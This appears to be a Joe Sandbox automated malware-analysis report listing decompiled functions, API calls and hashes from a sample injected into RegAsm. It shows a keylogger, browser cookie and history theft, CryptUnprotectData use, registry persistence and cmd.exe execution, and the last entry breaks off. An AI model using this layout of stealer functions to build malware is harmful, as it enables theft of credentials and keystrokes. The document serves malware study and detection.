                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                          Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636A1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                          • String ID: /sort "Visit Time" /stext "$0NG
                          • API String ID: 368326130-3219657780
                          • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                          • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                          Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00416330
                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcslen$CloseCreateValue
                          • String ID: !D@$okmode$PG
                          • API String ID: 3411444782-3370592832
                          • Opcode ID: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                          • Opcode Fuzzy Hash: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                          Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                          Strings
                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                          • API String ID: 1174141254-1980882731
                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                          Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                          Strings
                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                          • API String ID: 1174141254-1980882731
                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                          Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                          • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                          • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread$LocalTimewsprintf
                          • String ID: Offline Keylogger Started
                          • API String ID: 465354869-4114347211
                          • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                          • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                          Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread$LocalTime$wsprintf
                          • String ID: Online Keylogger Started
                          • API String ID: 112202259-1258561607
                          • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                          • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                          Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: CryptUnprotectData$crypt32
                          • API String ID: 2574300362-2380590389
                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                          Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                          • CloseHandle.KERNEL32(?), ref: 004051CA
                          • SetEvent.KERNEL32(?), ref: 004051D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandleObjectSingleWait
                          • String ID: Connection Timeout
                          • API String ID: 2055531096-499159329
                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                          Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                          Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                          • RegSetValueExW.ADVAPI32 ref: 00413888
                          • RegCloseKey.ADVAPI32(?), ref: 00413893
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateValue
                          • String ID: pth_unenc
                          • API String ID: 1818849710-4028850238
                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                          Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                          • String ID: bad locale name
                          • API String ID: 3628047217-1405518554
                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                          Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeHandleLibraryModule
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 662261464-1276376045
                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                          Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                          • ShowWindow.USER32(00000009), ref: 00416C9C
                          • SetForegroundWindow.USER32 ref: 00416CA8
                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                          • String ID: !D@
                          • API String ID: 186401046-604454484
                          • Opcode ID: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                          • Opcode Fuzzy Hash: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                          Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: /C $cmd.exe$open
                          • API String ID: 587946157-3896048727
                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                          Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                          Download Yara Rule
                          APIs
                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.|,004752F0,?,pth_unenc), ref: 0040B8F6
                          • UnhookWindowsHookEx.USER32 ref: 0040B902
                          • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: TerminateThread$HookUnhookWindows
                          • String ID: pth_unenc
                          • API String ID: 3123878439-4028850238
                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                          Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetCursorInfo$User32.dll
                          • API String ID: 1646373207-2714051624
                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                          Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetLastInputInfo$User32.dll
                          • API String ID: 2574300362-1519888992
                          • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                          • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                          • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                          • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                          Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                          Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                          Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
